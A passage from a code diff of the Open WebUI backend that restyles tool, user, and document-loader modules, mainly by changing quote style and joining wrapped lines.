Optional[ToolModel]: try: with get_db_context(db) as db: tool = db.get(Tool, id) return self._to_tool_model(tool, db=db) if tool else None except Exception: return None - def get_tools( - self, defer_content: bool = False, db: Optional[Session] = None - ) -> list[ToolUserModel]: + def get_tools(self, defer_content: bool = False, db: Optional[Session] = None) -> list[ToolUserModel]: with get_db_context(db) as db: query = db.query(Tool).order_by(Tool.updated_at.desc()) if defer_content: @@ -170,7 +160,7 @@ def get_tools( users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources("tool", tool_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('tool', tool_ids, db=db) tools = [] for tool in all_tools: @@ -183,7 +173,7 @@ def get_tools( access_grants=grants_map.get(tool.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) @@ -192,71 +182,59 @@ def get_tools( def get_tools_by_user_id( self, user_id: str, - permission: str = "write", + permission: str = 'write', defer_content: bool = False, db: Optional[Session] = None, ) -> list[ToolUserModel]: tools = self.get_tools(defer_content=defer_content, db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ tool for tool in tools if tool.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="tool", + resource_type='tool', resource_id=tool.id, permission=permission, user_group_ids=user_group_ids, db=db, ) ] - def get_tool_valves_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_tool_valves_by_id(self, id: str, db: Optional[Session] = None) -> Optional[dict]: try: with get_db_context(db) as db: tool = db.get(Tool, id) return tool.valves if tool.valves else {} except Exception as e: - log.exception(f"Error getting tool valves by id {id}") + log.exception(f'Error getting tool valves by id {id}') return None - def update_tool_valves_by_id( - self, id: str, valves: dict, db: Optional[Session] = None - ) -> Optional[ToolValves]: + def update_tool_valves_by_id(self, id: str, valves: dict, db: Optional[Session] = None) -> Optional[ToolValves]: try: with get_db_context(db) as db: - db.query(Tool).filter_by(id=id).update( - {"valves": valves, "updated_at": int(time.time())} - ) + db.query(Tool).filter_by(id=id).update({'valves': valves, 'updated_at': int(time.time())}) db.commit() return self.get_tool_by_id(id, db=db) except Exception: return None - def get_user_valves_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_user_valves_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[dict]: try: user = Users.get_user_by_id(user_id, db=db) user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "tools" and "valves" settings - if "tools" not in user_settings: - user_settings["tools"] = {} - if "valves" not in user_settings["tools"]: - user_settings["tools"]["valves"] = {} + if 'tools' not in user_settings: + user_settings['tools'] = {} + if 'valves' not in user_settings['tools']: + user_settings['tools']['valves'] = {} - return user_settings["tools"]["valves"].get(id, {}) + return user_settings['tools']['valves'].get(id, {}) except Exception as e: - log.exception( - f"Error getting user values by id {id} and user_id {user_id}: {e}" - ) + log.exception(f'Error getting user values by id {id} and user_id {user_id}: {e}') return None def update_user_valves_by_id_and_user_id( @@ -267,35 +245,29 @@ def update_user_valves_by_id_and_user_id( user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "tools" and "valves" settings - if "tools" not in user_settings: - user_settings["tools"] = {} - if "valves" not in user_settings["tools"]: - user_settings["tools"]["valves"] = {} + if 'tools' not in user_settings: + user_settings['tools'] = {} + if 'valves' not in user_settings['tools']: + user_settings['tools']['valves'] = {} - user_settings["tools"]["valves"][id] = valves + user_settings['tools']['valves'][id] = valves # Update the user settings in the database - Users.update_user_by_id(user_id, {"settings": user_settings}, db=db) + Users.update_user_by_id(user_id, {'settings': user_settings}, db=db) - return user_settings["tools"]["valves"][id] + return user_settings['tools']['valves'][id] except Exception as e: - log.exception( - f"Error updating user valves by id {id} and user_id {user_id}: {e}" - ) + log.exception(f'Error updating user valves by id {id} and user_id {user_id}: {e}') return None - def update_tool_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[ToolModel]: + def update_tool_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[ToolModel]: try: with get_db_context(db) as db: - access_grants = updated.pop("access_grants", None) - db.query(Tool).filter_by(id=id).update( - {**updated, "updated_at": int(time.time())} - ) + access_grants = updated.pop('access_grants', None) + db.query(Tool).filter_by(id=id).update({**updated, 'updated_at': int(time.time())}) db.commit() if access_grants is not None: - AccessGrants.set_access_grants("tool", id, access_grants, db=db) + AccessGrants.set_access_grants('tool', id, access_grants, db=db) tool = db.query(Tool).get(id) db.refresh(tool) @@ -306,7 +278,7 @@ def update_tool_by_id( def delete_tool_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("tool", id, db=db) + AccessGrants.revoke_all_access('tool', id, db=db) db.query(Tool).filter_by(id=id).delete() db.commit()
backend/open_webui/models/users.py+85 −142 modified@@ -40,12 +40,12 @@ class UserSettings(BaseModel): ui: Optional[dict] = {} - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') pass class User(Base): - __tablename__ = "user" + __tablename__ = 'user' id = Column(String, primary_key=True, unique=True) email = Column(String) @@ -83,7 +83,7 @@ class UserModel(BaseModel): email: str username: Optional[str] = None - role: str = "pending" + role: str = 'pending' name: str @@ -112,10 +112,10 @@ class UserModel(BaseModel): model_config = ConfigDict(from_attributes=True) - @model_validator(mode="after") + @model_validator(mode='after') def set_profile_image_url(self): if not self.profile_image_url: - self.profile_image_url = f"/api/v1/users/{self.id}/profile/image" + self.profile_image_url = f'/api/v1/users/{self.id}/profile/image' return self @@ -126,7 +126,7 @@ class UserStatusModel(UserModel): class ApiKey(Base): - __tablename__ = "api_key" + __tablename__ = 'api_key' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text, nullable=False) @@ -163,7 +163,7 @@ class UpdateProfileForm(BaseModel): gender: Optional[str] = None date_of_birth: Optional[datetime.date] = None - @field_validator("profile_image_url") + @field_validator('profile_image_url') @classmethod def check_profile_image_url(cls, v: str) -> str: return validate_profile_image_url(v) @@ -174,7 +174,7 @@ class UserGroupIdsModel(UserModel): class UserModelResponse(UserModel): - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class UserListResponse(BaseModel): @@ -251,7 +251,7 @@ class UserUpdateForm(BaseModel): profile_image_url: str password: Optional[str] = None - @field_validator("profile_image_url") + @field_validator('profile_image_url') @classmethod def check_profile_image_url(cls, v: str) -> str: return validate_profile_image_url(v) @@ -263,25 +263,25 @@ def insert_new_user( id: str, name: str, email: str, - profile_image_url: str = "/user.png", - role: str = "pending", + profile_image_url: str = '/user.png', + role: str = 'pending', username: Optional[str] = None, oauth: Optional[dict] = None, db: Optional[Session] = None, ) -> Optional[UserModel]: with get_db_context(db) as db: user = UserModel( **{ - "id": id, - "email": email, - "name": name, - "role": role, - "profile_image_url": profile_image_url, - "last_active_at": int(time.time()), - "created_at": int(time.time()), - "updated_at": int(time.time()), - "username": username, - "oauth": oauth, + 'id': id, + 'email': email, + 'name': name, + 'role': role, + 'profile_image_url': profile_image_url, + 'last_active_at': int(time.time()), + 'created_at': int(time.time()), + 'updated_at': int(time.time()), + 'username': username, + 'oauth': oauth, } ) result = User(**user.model_dump()) @@ -293,59 +293,40 @@ def insert_new_user( else: return None - def get_user_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def get_user_by_id(self, id: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() return UserModel.model_validate(user) except Exception: return None - def get_user_by_api_key( - self, api_key: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def get_user_by_api_key(self, api_key: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: - user = ( - db.query(User) - .join(ApiKey, User.id == ApiKey.user_id) - .filter(ApiKey.key == api_key) - .first() - ) + user = db.query(User).join(ApiKey, User.id == ApiKey.user_id).filter(ApiKey.key == api_key).first() return UserModel.model_validate(user) if user else None except Exception: return None - def get_user_by_email( - self, email: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def get_user_by_email(self, email: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: - user = ( - db.query(User) - .filter(func.lower(User.email) == email.lower()) - .first() - ) + user = db.query(User).filter(func.lower(User.email) == email.lower()).first() return UserModel.model_validate(user) if user else None except Exception: return None - def get_user_by_oauth_sub( - self, provider: str, sub: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def get_user_by_oauth_sub(self, provider: str, sub: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: # type: Session dialect_name = db.bind.dialect.name query = db.query(User) - if dialect_name == "sqlite": - query = query.filter(User.oauth.contains({provider: {"sub": sub}})) - elif dialect_name == "postgresql": - query = query.filter( - User.oauth[provider].cast(JSONB)["sub"].astext == sub - ) + if dialect_name == 'sqlite': + query = query.filter(User.oauth.contains({provider: {'sub': sub}})) + elif dialect_name == 'postgresql': + query = query.filter(User.oauth[provider].cast(JSONB)['sub'].astext == sub) user = query.first() return UserModel.model_validate(user) if user else None @@ -361,15 +342,10 @@ def get_user_by_scim_external_id( dialect_name = db.bind.dialect.name query = db.query(User) - if dialect_name == "sqlite": - query = query.filter( - User.scim.contains({provider: {"external_id": external_id}}) - ) - elif dialect_name == "postgresql": - query = query.filter( - User.scim[provider].cast(JSONB)["external_id"].astext - == external_id - ) + if dialect_name == 'sqlite': + query = query.filter(User.scim.contains({provider: {'external_id': external_id}})) + elif dialect_name == 'postgresql': + query = query.filter(User.scim[provider].cast(JSONB)['external_id'].astext == external_id) user = query.first() return UserModel.model_validate(user) if user else None @@ -388,16 +364,16 @@ def get_users( query = db.query(User).options(defer(User.profile_image_url)) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), ) ) - channel_id = filter.get("channel_id") + channel_id = filter.get('channel_id') if channel_id: query = query.filter( exists( @@ -408,13 +384,13 @@ def get_users( ) ) - user_ids = filter.get("user_ids") - group_ids = filter.get("group_ids") + user_ids = filter.get('user_ids') + group_ids = filter.get('group_ids') if isinstance(user_ids, list) and isinstance(group_ids, list): # If both are empty lists, return no users if not user_ids and not group_ids: - return {"users": [], "total": 0} + return {'users': [], 'total': 0} if user_ids: query = query.filter(User.id.in_(user_ids)) @@ -429,21 +405,21 @@ def get_users( ) ) - roles = filter.get("roles") + roles = filter.get('roles') if roles: - include_roles = [role for role in roles if not role.startswith("!")] - exclude_roles = [role[1:] for role in roles if role.startswith("!")] + include_roles = [role for role in roles if not role.startswith('!')] + exclude_roles = [role[1:] for role in roles if role.startswith('!')] if include_roles: query = query.filter(User.role.in_(include_roles)) if exclude_roles: query = query.filter(~User.role.in_(exclude_roles)) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by and order_by.startswith("group_id:"): - group_id = order_by.split(":", 1)[1] + if order_by and order_by.startswith('group_id:'): + group_id = order_by.split(':', 1)[1] # Subquery that checks if the user belongs to the group membership_exists = exists( @@ -456,42 +432,42 @@ def get_users( # CASE: user in group → 1, user not in group → 0 group_sort = case((membership_exists, 1), else_=0) - if direction == "asc": + if direction == 'asc': query = query.order_by(group_sort.asc(), User.name.asc()) else: query = query.order_by(group_sort.desc(), User.name.asc()) - elif order_by == "name": - if direction == "asc": + elif order_by == 'name': + if direction == 'asc': query = query.order_by(User.name.asc()) else: query = query.order_by(User.name.desc()) - elif order_by == "email": - if direction == "asc": + elif order_by == 'email': + if direction == 'asc': query = query.order_by(User.email.asc()) else: query = query.order_by(User.email.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(User.created_at.asc()) else: query = query.order_by(User.created_at.desc()) - elif order_by == "last_active_at": - if direction == "asc": + elif order_by == 'last_active_at': + if direction == 'asc': query = query.order_by(User.last_active_at.asc()) else: query = query.order_by(User.last_active_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(User.updated_at.asc()) else: query = query.order_by(User.updated_at.desc()) - elif order_by == "role": - if direction == "asc": + elif order_by == 'role': + if direction == 'asc': query = query.order_by(User.role.asc()) else: query = query.order_by(User.role.desc()) @@ -510,13 +486,11 @@ def get_users( users = query.all() return { - "users": [UserModel.model_validate(user) for user in users], - "total": total, + 'users': [UserModel.model_validate(user) for user in users], + 'total': total, } - def get_users_by_group_id( - self, group_id: str, db: Optional[Session] = None - ) -> list[UserModel]: + def get_users_by_group_id(self, group_id: str, db: Optional[Session] = None) -> list[UserModel]: with get_db_context(db) as db: users = ( db.query(User) @@ -527,16 +501,9 @@ def get_users_by_group_id( ) return [UserModel.model_validate(user) for user in users] - def get_users_by_user_ids( - self, user_ids: list[str], db: Optional[Session] = None - ) -> list[UserStatusModel]: + def get_users_by_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> list[UserStatusModel]: with get_db_context(db) as db: - users = ( - db.query(User) - .options(defer(User.profile_image_url)) - .filter(User.id.in_(user_ids)) - .all() - ) + users = db.query(User).options(defer(User.profile_image_url)).filter(User.id.in_(user_ids)).all() return [UserModel.model_validate(user) for user in users] def get_num_users(self, db: Optional[Session] = None) -> Optional[int]: @@ -555,36 +522,26 @@ def get_first_user(self, db: Optional[Session] = None) -> UserModel: except Exception: return None - def get_user_webhook_url_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[str]: + def get_user_webhook_url_by_id(self, id: str, db: Optional[Session] = None) -> Optional[str]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() if user.settings is None: return None else: - return ( - user.settings.get("ui", {}) - .get("notifications", {}) - .get("webhook_url", None) - ) + return user.settings.get('ui', {}).get('notifications', {}).get('webhook_url', None) except Exception: return None def get_num_users_active_today(self, db: Optional[Session] = None) -> Optional[int]: with get_db_context(db) as db: current_timestamp = int(datetime.datetime.now().timestamp()) today_midnight_timestamp = current_timestamp - (current_timestamp % 86400) - query = db.query(User).filter( - User.last_active_at > today_midnight_timestamp - ) + query = db.query(User).filter(User.last_active_at > today_midnight_timestamp) return query.count() - def update_user_role_by_id( - self, id: str, role: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def update_user_role_by_id(self, id: str, role: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() @@ -629,9 +586,7 @@ def update_user_profile_image_url_by_id( return None @throttle(DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL) - def update_last_active_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[UserModel]: + def update_last_active_by_id(self, id: str, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() @@ -665,10 +620,10 @@ def update_user_oauth_by_id( oauth = user.oauth or {} # Update or insert provider entry - oauth[provider] = {"sub": sub} + oauth[provider] = {'sub': sub} # Persist updated JSON - db.query(User).filter_by(id=id).update({"oauth": oauth}) + db.query(User).filter_by(id=id).update({'oauth': oauth}) db.commit() return UserModel.model_validate(user) @@ -698,19 +653,17 @@ def update_user_scim_by_id( return None scim = user.scim or {} - scim[provider] = {"external_id": external_id} + scim[provider] = {'external_id': external_id} - db.query(User).filter_by(id=id).update({"scim": scim}) + db.query(User).filter_by(id=id).update({'scim': scim}) db.commit() return UserModel.model_validate(user) except Exception: return None - def update_user_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[UserModel]: + def update_user_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() @@ -725,9 +678,7 @@ def update_user_by_id( print(e) return None - def update_user_settings_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[UserModel]: + def update_user_settings_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[UserModel]: try: with get_db_context(db) as db: user = db.query(User).filter_by(id=id).first() @@ -741,7 +692,7 @@ def update_user_settings_by_id( user_settings.update(updated) - db.query(User).filter_by(id=id).update({"settings": user_settings}) + db.query(User).filter_by(id=id).update({'settings': user_settings}) db.commit() user = db.query(User).filter_by(id=id).first() @@ -768,27 +719,23 @@ def delete_user_by_id(self, id: str, db: Optional[Session] = None) -> bool: except Exception: return False - def get_user_api_key_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[str]: + def get_user_api_key_by_id(self, id: str, db: Optional[Session] = None) -> Optional[str]: try: with get_db_context(db) as db: api_key = db.query(ApiKey).filter_by(user_id=id).first() return api_key.key if api_key else None except Exception: return None - def update_user_api_key_by_id( - self, id: str, api_key: str, db: Optional[Session] = None - ) -> bool: + def update_user_api_key_by_id(self, id: str, api_key: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: db.query(ApiKey).filter_by(user_id=id).delete() db.commit() now = int(time.time()) new_api_key = ApiKey( - id=f"key_{id}", + id=f'key_{id}', user_id=id, key=api_key, created_at=now, @@ -811,16 +758,14 @@ def delete_user_api_key_by_id(self, id: str, db: Optional[Session] = None) -> bo except Exception: return False - def get_valid_user_ids( - self, user_ids: list[str], db: Optional[Session] = None - ) -> list[str]: + def get_valid_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> list[str]: with get_db_context(db) as db: users = db.query(User).filter(User.id.in_(user_ids)).all() return [user.id for user in users] def get_super_admin_user(self, db: Optional[Session] = None) -> Optional[UserModel]: with get_db_context(db) as db: - user = db.query(User).filter_by(role="admin").first() + user = db.query(User).filter_by(role='admin').first() if user: return UserModel.model_validate(user) else: @@ -830,9 +775,7 @@ def get_active_user_count(self, db: Optional[Session] = None) -> int: with get_db_context(db) as db: # Consider user active if last_active_at within the last 3 minutes three_minutes_ago = int(time.time()) - 180 - count = ( - db.query(User).filter(User.last_active_at >= three_minutes_ago).count() - ) + count = db.query(User).filter(User.last_active_at >= three_minutes_ago).count() return count @staticmethod
backend/open_webui/retrieval/loaders/datalab_marker.py+91 −110 modified@@ -40,108 +40,102 @@ def __init__( self.output_format = output_format def _get_mime_type(self, filename: str) -> str: - ext = filename.rsplit(".", 1)[-1].lower() + ext = filename.rsplit('.', 1)[-1].lower() mime_map = { - "pdf": "application/pdf", - "xls": "application/vnd.ms-excel", - "xlsx": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", - "ods": "application/vnd.oasis.opendocument.spreadsheet", - "doc": "application/msword", - "docx": "application/vnd.openxmlformats-officedocument.wordprocessingml.document", - "odt": "application/vnd.oasis.opendocument.text", - "ppt": "application/vnd.ms-powerpoint", - "pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation", - "odp": "application/vnd.oasis.opendocument.presentation", - "html": "text/html", - "epub": "application/epub+zip", - "png": "image/png", - "jpeg": "image/jpeg", - "jpg": "image/jpeg", - "webp": "image/webp", - "gif": "image/gif", - "tiff": "image/tiff", + 'pdf': 'application/pdf', + 'xls': 'application/vnd.ms-excel', + 'xlsx': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', + 'ods': 'application/vnd.oasis.opendocument.spreadsheet', + 'doc': 'application/msword', + 'docx': 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + 'odt': 'application/vnd.oasis.opendocument.text', + 'ppt': 'application/vnd.ms-powerpoint', + 'pptx': 'application/vnd.openxmlformats-officedocument.presentationml.presentation', + 'odp': 'application/vnd.oasis.opendocument.presentation', + 'html': 'text/html', + 'epub': 'application/epub+zip', + 'png': 'image/png', + 'jpeg': 'image/jpeg', + 'jpg': 'image/jpeg', + 'webp': 'image/webp', + 'gif': 'image/gif', + 'tiff': 'image/tiff', } - return mime_map.get(ext, "application/octet-stream") + return mime_map.get(ext, 'application/octet-stream') def check_marker_request_status(self, request_id: str) -> dict: - url = f"{self.api_base_url}/{request_id}" - headers = {"X-Api-Key": self.api_key} + url = f'{self.api_base_url}/{request_id}' + headers = {'X-Api-Key': self.api_key} try: response = requests.get(url, headers=headers) response.raise_for_status() result = response.json() - log.info(f"Marker API status check for request {request_id}: {result}") + log.info(f'Marker API status check for request {request_id}: {result}') return result except requests.HTTPError as e: - log.error(f"Error checking Marker request status: {e}") + log.error(f'Error checking Marker request status: {e}') raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"Failed to check Marker request: {e}", + detail=f'Failed to check Marker request: {e}', ) except ValueError as e: - log.error(f"Invalid JSON checking Marker request: {e}") - raise HTTPException( - status.HTTP_502_BAD_GATEWAY, detail=f"Invalid JSON: {e}" - ) + log.error(f'Invalid JSON checking Marker request: {e}') + raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Invalid JSON: {e}') def load(self) -> List[Document]: filename = os.path.basename(self.file_path) mime_type = self._get_mime_type(filename) - headers = {"X-Api-Key": self.api_key} + headers = {'X-Api-Key': self.api_key} form_data = { - "use_llm": str(self.use_llm).lower(), - "skip_cache": str(self.skip_cache).lower(), - "force_ocr": str(self.force_ocr).lower(), - "paginate": str(self.paginate).lower(), - "strip_existing_ocr": str(self.strip_existing_ocr).lower(), - "disable_image_extraction": str(self.disable_image_extraction).lower(), - "format_lines": str(self.format_lines).lower(), - "output_format": self.output_format, + 'use_llm': str(self.use_llm).lower(), + 'skip_cache': str(self.skip_cache).lower(), + 'force_ocr': str(self.force_ocr).lower(), + 'paginate': str(self.paginate).lower(), + 'strip_existing_ocr': str(self.strip_existing_ocr).lower(), + 'disable_image_extraction': str(self.disable_image_extraction).lower(), + 'format_lines': str(self.format_lines).lower(), + 'output_format': self.output_format, } if self.additional_config and self.additional_config.strip(): - form_data["additional_config"] = self.additional_config + form_data['additional_config'] = self.additional_config log.info( f"Datalab Marker POST request parameters: {{'filename': '{filename}', 'mime_type': '{mime_type}', **{form_data}}}" ) try: - with open(self.file_path, "rb") as f: - files = {"file": (filename, f, mime_type)} + with open(self.file_path, 'rb') as f: + files = {'file': (filename, f, mime_type)} response = requests.post( - f"{self.api_base_url}", + f'{self.api_base_url}', data=form_data, files=files, headers=headers, ) response.raise_for_status() result = response.json() except FileNotFoundError: - raise HTTPException( - status.HTTP_404_NOT_FOUND, detail=f"File not found: {self.file_path}" - ) + raise HTTPException(status.HTTP_404_NOT_FOUND, detail=f'File not found: {self.file_path}') except requests.HTTPError as e: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Datalab Marker request failed: {e}", + detail=f'Datalab Marker request failed: {e}', ) except ValueError as e: - raise HTTPException( - status.HTTP_502_BAD_GATEWAY, detail=f"Invalid JSON response: {e}" - ) + raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Invalid JSON response: {e}') except Exception as e: raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR, detail=str(e)) - if not result.get("success"): + if not result.get('success'): raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Datalab Marker request failed: {result.get('error', 'Unknown error')}", + detail=f'Datalab Marker request failed: {result.get("error", "Unknown error")}', ) - check_url = result.get("request_check_url") - request_id = result.get("request_id") + check_url = result.get('request_check_url') + request_id = result.get('request_id') # Check if this is a direct response (self-hosted) or polling response (DataLab) if check_url: @@ -154,54 +148,45 @@ def load(self) -> List[Document]: poll_result = poll_response.json() except (requests.HTTPError, ValueError) as e: raw_body = poll_response.text - log.error(f"Polling error: {e}, response body: {raw_body}") - raise HTTPException( - status.HTTP_502_BAD_GATEWAY, detail=f"Polling failed: {e}" - ) + log.error(f'Polling error: {e}, response body: {raw_body}') + raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Polling failed: {e}') - status_val = poll_result.get("status") - success_val = poll_result.get("success") + status_val = poll_result.get('status') + success_val = poll_result.get('success') - if status_val == "complete": + if status_val == 'complete': summary = { k: poll_result.get(k) for k in ( - "status", - "output_format", - "success", - "error", - "page_count", - "total_cost", + 'status', + 'output_format', + 'success', + 'error', + 'page_count', + 'total_cost', ) } - log.info( - f"Marker processing completed successfully: {json.dumps(summary, indent=2)}" - ) + log.info(f'Marker processing completed successfully: {json.dumps(summary, indent=2)}') break - if status_val == "failed" or success_val is False: - log.error( - f"Marker poll failed full response: {json.dumps(poll_result, indent=2)}" - ) - error_msg = ( - poll_result.get("error") - or "Marker returned failure without error message" - ) + if status_val == 'failed' or success_val is False: + log.error(f'Marker poll failed full response: {json.dumps(poll_result, indent=2)}') + error_msg = poll_result.get('error') or 'Marker returned failure without error message' raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Marker processing failed: {error_msg}", + detail=f'Marker processing failed: {error_msg}', ) else: raise HTTPException( status.HTTP_504_GATEWAY_TIMEOUT, - detail="Marker processing timed out", + detail='Marker processing timed out', ) - if not poll_result.get("success", False): - error_msg = poll_result.get("error") or "Unknown processing error" + if not poll_result.get('success', False): + error_msg = poll_result.get('error') or 'Unknown processing error' raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Final processing failed: {error_msg}", + detail=f'Final processing failed: {error_msg}', ) # DataLab format - content in format-specific fields @@ -210,69 +195,65 @@ def load(self) -> List[Document]: final_result = poll_result else: # Self-hosted direct response - content in "output" field - if "output" in result: - log.info("Self-hosted Marker returned direct response without polling") - raw_content = result.get("output") + if 'output' in result: + log.info('Self-hosted Marker returned direct response without polling') + raw_content = result.get('output') final_result = result else: - available_fields = ( - list(result.keys()) - if isinstance(result, dict) - else "non-dict response" - ) + available_fields = list(result.keys()) if isinstance(result, dict) else 'non-dict response' raise HTTPException( status.HTTP_502_BAD_GATEWAY, detail=f"Custom Marker endpoint returned success but no 'output' field found. Available fields: {available_fields}. Expected either 'request_check_url' for polling or 'output' field for direct response.", ) - if self.output_format.lower() == "json": + if self.output_format.lower() == 'json': full_text = json.dumps(raw_content, indent=2) - elif self.output_format.lower() in {"markdown", "html"}: + elif self.output_format.lower() in {'markdown', 'html'}: full_text = str(raw_content).strip() else: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Unsupported output format: {self.output_format}", + detail=f'Unsupported output format: {self.output_format}', ) if not full_text: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail="Marker returned empty content", + detail='Marker returned empty content', ) - marker_output_dir = os.path.join("/app/backend/data/uploads", "marker_output") + marker_output_dir = os.path.join('/app/backend/data/uploads', 'marker_output') os.makedirs(marker_output_dir, exist_ok=True) - file_ext_map = {"markdown": "md", "json": "json", "html": "html"} - file_ext = file_ext_map.get(self.output_format.lower(), "txt") - output_filename = f"{os.path.splitext(filename)[0]}.{file_ext}" + file_ext_map = {'markdown': 'md', 'json': 'json', 'html': 'html'} + file_ext = file_ext_map.get(self.output_format.lower(), 'txt') + output_filename = f'{os.path.splitext(filename)[0]}.{file_ext}' output_path = os.path.join(marker_output_dir, output_filename) try: - with open(output_path, "w", encoding="utf-8") as f: + with open(output_path, 'w', encoding='utf-8') as f: f.write(full_text) - log.info(f"Saved Marker output to: {output_path}") + log.info(f'Saved Marker output to: {output_path}') except Exception as e: - log.warning(f"Failed to write marker output to disk: {e}") + log.warning(f'Failed to write marker output to disk: {e}') metadata = { - "source": filename, - "output_format": final_result.get("output_format", self.output_format), - "page_count": final_result.get("page_count", 0), - "processed_with_llm": self.use_llm, - "request_id": request_id or "", + 'source': filename, + 'output_format': final_result.get('output_format', self.output_format), + 'page_count': final_result.get('page_count', 0), + 'processed_with_llm': self.use_llm, + 'request_id': request_id or '', } - images = final_result.get("images", {}) + images = final_result.get('images', {}) if images: - metadata["image_count"] = len(images) - metadata["images"] = json.dumps(list(images.keys())) + metadata['image_count'] = len(images) + metadata['images'] = json.dumps(list(images.keys())) for k, v in metadata.items(): if isinstance(v, (dict, list)): metadata[k] = json.dumps(v) elif v is None: - metadata[k] = "" + metadata[k] = '' return [Document(page_content=full_text, metadata=metadata)]
backend/open_webui/retrieval/loaders/external_document.py+15 −18 modified@@ -29,61 +29,58 @@ def __init__( self.user = user def load(self) -> List[Document]: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: data = f.read() headers = {} if self.mime_type is not None: - headers["Content-Type"] = self.mime_type + headers['Content-Type'] = self.mime_type if self.api_key is not None: - headers["Authorization"] = f"Bearer {self.api_key}" + headers['Authorization'] = f'Bearer {self.api_key}' try: - headers["X-Filename"] = quote(os.path.basename(self.file_path)) + headers['X-Filename'] = quote(os.path.basename(self.file_path)) except Exception: pass if self.user is not None: headers = include_user_info_headers(headers, self.user) url = self.url - if url.endswith("/"): + if url.endswith('/'): url = url[:-1] try: - response = requests.put(f"{url}/process", data=data, headers=headers) + response = requests.put(f'{url}/process', data=data, headers=headers) except Exception as e: - log.error(f"Error connecting to endpoint: {e}") - raise Exception(f"Error connecting to endpoint: {e}") + log.error(f'Error connecting to endpoint: {e}') + raise Exception(f'Error connecting to endpoint: {e}') if response.ok: - response_data = response.json() if response_data: if isinstance(response_data, dict): return [ Document( - page_content=response_data.get("page_content"), - metadata=response_data.get("metadata"), + page_content=response_data.get('page_content'), + metadata=response_data.get('metadata'), ) ] elif isinstance(response_data, list): documents = [] for document in response_data: documents.append( Document( - page_content=document.get("page_content"), - metadata=document.get("metadata"), + page_content=document.get('page_content'), + metadata=document.get('metadata'), ) ) return documents else: - raise Exception("Error loading document: Unable to parse content") + raise Exception('Error loading document: Unable to parse content') else: - raise Exception("Error loading document: No content returned") + raise Exception('Error loading document: No content returned') else: - raise Exception( - f"Error loading document: {response.status_code} {response.text}" - ) + raise Exception(f'Error loading document: {response.status_code} 